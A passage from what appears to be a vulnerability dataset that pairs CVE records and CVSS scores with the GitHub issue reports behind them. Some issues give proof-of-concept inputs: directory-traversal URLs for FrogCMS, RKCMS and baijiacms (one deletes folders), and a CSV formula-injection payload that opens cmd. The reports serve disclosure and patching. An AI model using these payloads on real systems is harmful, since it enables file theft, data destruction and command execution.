"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/DSpace/DSpace/commit/277b499a5cd3a4f5eb2370513a1b7e4ec2a6e041"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/DSpace/DSpace/commit/c3bea16ab911606e15ae96c97a1575e1ffb14f8a"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/DSpace/DSpace/issues/7928"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/DSpace/DSpace/security/advisories/GHSA-cf2j-vf36-c6w8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/DSpace/DSpace/commit/277b499a5cd3a4f5eb2370513a1b7e4ec2a6e041"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/DSpace/DSpace/commit/c3bea16ab911606e15ae96c97a1575e1ffb14f8a"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/DSpace/DSpace/issues/7928"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/DSpace/DSpace/security/advisories/GHSA-cf2j-vf36-c6w8"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:duraspace:dspace:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EC2273B4-D6B6-4968-BF9A-65812B5799A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"863"
] | 863 | https://github.com/DSpace/DSpace/issues/7928 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"DSpace",
"DSpace"
] | **Describe the bug**
The "Anonymous" group has the "Articles" collection as linked object:
[https://api7.dspace.org/server/api/eperson/groups/f2c7eb75-aec0-4604-ab7f-6676723818ad/object](https://api7.dspace.org/server/api/eperson/groups/f2c7eb75-aec0-4604-ab7f-6676723818ad/object)
This is not true, as it's not a `COLLECTION_[uuid]_*` group.

**Related work**
https://github.com/DSpace/dspace-angular/pull/1298 | REST service returns wrong object for the "Anonymous" group | https://api.github.com/repos/DSpace/DSpace/issues/7928/comments | 2 | 2021-09-02T14:01:40Z | 2021-10-26T16:39:32Z | https://github.com/DSpace/DSpace/issues/7928 | 986,773,109 | 7,928 | 2,726 |
CVE-2020-25872 | 2021-10-29T20:15:07.747 | A vulnerability exists within the FileManagerController.php function in FrogCMS 0.9.5 which allows an attacker to perform a directory traversal attack via a GET request urlencode parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/philippe/FrogCMS/issues/34"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/philippe/FrogCMS/issues/34"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:frogcms_project:frogcms:0.9.5:*:*:*:*:*:*:*",
"matchCriteriaId": "1B03397C-68B4-4C54-B001-8B5BC5FE427A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/philippe/FrogCMS/issues/34 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"philippe",
"FrogCMS"
] | There is a directory traversal vulnerability when logined as a admin and view the uploaded files.An attacker can read arbitrarily file on a remote server via GET request urlencode parameter.
1.Read config.php.
```
http://127.0.0.1:8888/FrogCMS/admin/?/plugin/file_manager/view/.%2f%2f./config.php
```

2.Read index.php.
```
http://127.0.0.1:8888/FrogCMS/admin/?/plugin/file_manager/view/.%2f%2f./index.php
```

| FrogCMSv0.9.5 Directory Traversal Vulnerability | https://api.github.com/repos/philippe/FrogCMS/issues/34/comments | 3 | 2020-09-14T17:17:47Z | 2021-04-20T01:22:39Z | https://github.com/philippe/FrogCMS/issues/34 | 701,282,922 | 34 | 2,727 |
CVE-2020-25873 | 2021-10-29T20:15:07.983 | A directory traversal vulnerability in the component system/manager/class/web/database.php was discovered in Baijiacms V4 which allows attackers to arbitrarily delete folders on the server via the "id" parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/baijiacms/baijiacmsV4/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/baijiacms/baijiacmsV4/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:baijiacms_project:baijiacms:4:*:*:*:*:*:*:*",
"matchCriteriaId": "BE184151-E7CF-41A9-A6E1-68E0C8236382",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/baijiacms/baijiacmsV4/issues/6 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"baijiacms",
"baijiacmsV4"
] | Directory traversal vulnerability in baijiacmsV4 allows remote authenticated attackers to delete arbitrary folders on the server via unspecified vectors.
Vulnerable code is in system/manager/class/web/database.php
```
if($operation=='delete')
{
$d = base64_decode($_GP['id']);
$path = WEB_ROOT . '/config/data_backup/';
if(is_dir($path . $d)) {
rmdirs($path . $d);
message('备份删除成功!', create_url('site', array('act' => 'manager','do' => 'database','op'=>'restore')),'success');
}
}
```
The origin request is `http://127.0.0.1:8888/baijiacms/index.php?mod=site&act=manager&do=database&op=delete&id=MTYwMDQ5ODY5OV9RejQzQmhaOQ%3D%3D&beid=1`,which is used to delete database backuped folder.We can change the parameter "id" to delete any folders.
For example:
1. Create a folder named test

2. Base64encode "../../test"

3. Change the parameter id to "Li4vLi4vdGVzdA%3d%3d" and request this url "http://127.0.0.1:8888/baijiacms/index.php?mod=site&act=manager&do=database&op=delete&id=Li4vLi4vdGVzdA%3d%3d&beid=1"

4. Now the test folder is deleted.

5. An authenticated attacker can destroy the whole website just use the parameter "../../../" after base64encode. | baijiacmsV4 directory traversal vulnerability | https://api.github.com/repos/baijiacms/baijiacmsV4/issues/6/comments | 0 | 2020-09-19T08:11:29Z | 2020-09-19T08:11:29Z | https://github.com/baijiacms/baijiacmsV4/issues/6 | 704,832,797 | 6 | 2,728 |
CVE-2020-25881 | 2021-10-29T20:15:08.220 | A vulnerability was discovered in the filename parameter in pathindex.php?r=cms-backend/attachment/delete&sub=&filename=../../../../111.txt&filetype=image/jpeg of the master version of RKCMS. This vulnerability allows for an attacker to perform a directory traversal via a crafted .txt file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://www.ranko.cn/index.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://gitee.com/wuxi_ranko/cms"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/AubreyJun/cms/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://www.ranko.cn/index.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://gitee.com/wuxi_ranko/cms"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/AubreyJun/cms/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ranko:rkcms:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C6F02F3E-07F3-4477-8228-52FF777F3CE8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/AubreyJun/cms/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"AubreyJun",
"cms"
] | ### 1 Deploy the RKCMS locally
### 2 Create a file, such as 111.txt

### 3 Log in the application
### 4 Delete a attachment,apture this packet ,change the filename parameter to ../../../../111.txt,submit this request


### 5 111.txt was deleted

### 6 The source code for this function is in AttachmentController.php

### 7 filename parameter does not have any filtering
 | There is a directory traversal vulnerability at attachment deletion | https://api.github.com/repos/AubreyJun/cms/issues/2/comments | 0 | 2020-09-15T10:19:11Z | 2020-09-15T10:19:11Z | https://github.com/AubreyJun/cms/issues/2 | 701,804,336 | 2 | 2,729 |
CVE-2020-25911 | 2021-10-31T19:15:09.780 | A XML External Entity (XXE) vulnerability was discovered in the modRestServiceRequest component in MODX CMS 2.7.3 which can lead to an information disclosure or denial of service (DOS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/dahua966/Vul_disclose/blob/main/XXE_modxcms.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/modxcms/revolution/issues/15237"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/dahua966/Vul_disclose/blob/main/XXE_modxcms.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/modxcms/revolution/issues/15237"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:modx:modx_revolution:2.7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "846F6D4B-F455-4BCE-A756-7F1B0FE02456",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"611"
] | 611 | https://github.com/modxcms/revolution/issues/15237 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"modxcms",
"revolution"
] | snipped | XXE Vulnerability | https://api.github.com/repos/modxcms/revolution/issues/15237/comments | 7 | 2020-09-16T14:33:59Z | 2020-09-21T01:02:16Z | https://github.com/modxcms/revolution/issues/15237 | 702,819,250 | 15,237 | 2,730 |
CVE-2020-25912 | 2021-10-31T19:15:09.857 | A XML External Entity (XXE) vulnerability was discovered in symphony\lib\toolkit\class.xmlelement.php in Symphony 2.7.10 which can lead to an information disclosure or denial of service (DOS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://symphony.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/symphonycms/symphonycms/issues/2924"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://symphony.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/symphonycms/symphonycms/issues/2924"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:getsymphony:symphony:2.7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "19FE5DB3-D579-431F-A470-4B9BDDD7BB21",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"611"
] | 611 | https://github.com/symphonycms/symphonycms/issues/2924 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"symphonycms",
"symphonycms"
] | https://github.com/symphonycms/symphonycms/blob/master/symphony/lib/toolkit/class.xmlelement.php
public static function convertFromXMLString($root_element, $xml)
{
$doc = new DOMDocument('1.0', 'utf-8');
$doc->loadXML($xml);
return self::convertFromDOMDocument($root_element, $doc);
}
Crafted user input could lead to XXE vulnerability as the external entity is not disabled here. | XXE Vulnerability | https://api.github.com/repos/symphonycms/symphonycms/issues/2924/comments | 1 | 2020-09-21T02:52:43Z | 2021-11-01T12:27:42Z | https://github.com/symphonycms/symphonycms/issues/2924 | 705,248,456 | 2,924 | 2,731 |
CVE-2020-26707 | 2021-10-31T20:15:07.887 | An issue was discovered in the add function in Shenzhim AAPTJS 1.3.1 which allows attackers to execute arbitrary code via the filePath parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/shenzhim/aaptjs/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/shenzhim/aaptjs/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:aaptjs_project:aaptjs:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "17215EC6-90DF-41F4-959C-BA2E37CD1DD4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"78"
] | 78 | https://github.com/shenzhim/aaptjs/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"shenzhim",
"aaptjs"
] | It fails to restrict the arbitrary commands in the user input which results in the execution of code(RCE/Information Disclosure/DoS).
https://github.com/shenzhim/aaptjs/blob/f9fab0b5c3530a6d117cc4f98732b4b231c7962f/index.js#L18
Raised the same issue in Hackerone as well with POC.:
https://hackerone.com/reports/996483
| Remote Code Execution(RCE) via insecure command formatting | https://api.github.com/repos/shenzhim/aaptjs/issues/2/comments | 0 | 2020-10-02T12:51:33Z | 2020-10-02T12:51:33Z | https://github.com/shenzhim/aaptjs/issues/2 | 713,597,534 | 2 | 2,732 |
CVE-2020-36503 | 2021-11-01T09:15:08.257 | The Connections Business Directory WordPress plugin before 9.7 does not validate or sanitise some connections' fields, which could lead to a CSV injection issue | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Connections-Business-Directory/Connections/issues/474"
},
{
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://wpscan.com/vulnerability/dd394b55-c86f-4fa2-aae8-5903ca0b95ec"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Connections-Business-Directory/Connections/issues/474"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://wpscan.com/vulnerability/dd394b55-c86f-4fa2-aae8-5903ca0b95ec"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:connections-pro:connections_business_directory:*:*:*:*:*:wordpress:*:*",
"matchCriteriaId": "A480CA1C-2F8E-4CDE-BE42-D1DE152D729A",
"versionEndExcluding": null,
"versionEndIncluding": "9.6",
"versionStartExcluding": null,
"versionStartIncluding": "0.7.3.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1236"
] | 1236 | https://github.com/Connections-Business-Directory/Connections/issues/474 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Connections-Business-Directory",
"Connections"
] | ## Description
CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. Which lead to hijacking user’s computer by exploiting with untrusted input. In this plugin, all the input fields of [connections_add](http://localhost/wordpress/wp-admin/admin.php?page=connections_add) are affected.
## Affected Item
>Export All feature
## Affected Version
>0.7.3.2 <= 9.6
## Tested With
>Wordpress 5.4.1
## Step to reproduce
1. Login to your website
2. Visit http://localhost/wordpress/wp-admin/admin.php?page=connections_add
3. In the input filed add payload `@SUM(1+1)*cmd|' /C calc'!A0`
4. Visit [Connections Tools](http://localhost/wordpress/wp-admin/admin.php?page=connections_tools) and then click on `Export All`
5. It will download a file `cn-export-all-MM-DD-YYYY.csv` open it with `Microsoft Excel`
6. It will open `CMD`
## Exported CSV File
|Entry ID|Order|Entry Type|Visibility|Categories |Family Name|Honorific Prefix |First Name |Middle Name |Last Name |Honorific Suffix |Title |Organization |Department |Contact First Name|Contact Last Name|Home Address | Line One |Home Address | Line Two |Home Address | Line Three |Home Address | Line Four |Home Address | District |Home Address | County |Home Address | City |Home Address | State |Home Address | Zipcode |Home Address | Country |Home Address | Latitude|Home Address | Longitude|Home Address | Visibility|Phone Number|Phone Visibility|Email Address|Email Visibility|Social Url|Social Visibility|Im Uid|Im Visibility|Links Url|Links Title|Links Visibility|Dates Date|Dates Visibility|Biography|Notes|Photo URL|Logo URL|
|--------|-----|----------|----------|-------------|-----------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|------------------|-----------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|-----------------------|------------------------|-------------------------|------------|----------------|-------------|----------------|----------|-----------------|------|-------------|---------|-----------|----------------|----------|----------------|---------|-----|---------|--------|
|2 |0 |individual|public |Uncategorized| |@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0| | |@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0|@SUM(1+1)*cmd|' /C calc'!A0| | |public | | | | | | | | | | | | | | | | | |
All fields are not checked because `getData()` doesn't filter any of the fields.
https://github.com/Connections-Business-Directory/Connections/blob/c69ea8df74568c2c86f47c0b0f1adc17a22488e1/includes/export/class.csv-export-batch-all.php#L758-L788
## Reference
> [OWASP CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection)
Hopefully, it will fix soon, Let me know if you have any questions.
Thanks,
@rudSarkar | Connections 0.7.3.2 <= 9.6 CSV Injection | https://api.github.com/repos/Connections-Business-Directory/Connections/issues/474/comments | 9 | 2020-05-29T20:57:44Z | 2020-06-24T19:39:58Z | https://github.com/Connections-Business-Directory/Connections/issues/474 | 627,534,307 | 474 | 2,733 |
CVE-2021-22563 | 2021-11-01T13:15:07.657 | Invalid JPEG XL images using libjxl can cause an out of bounds access on a std::vector<std::vector<T>> when rendering splines. The OOB read access can either lead to a segfault, or rendering splines based on other process memory. It is recommended to upgrade past 0.6.0 or patch with https://github.com/libjxl/libjxl/pull/757 | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 3.6,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 4.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1,
"impactScore": 3.4,
"source": "cve-coordination@google.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
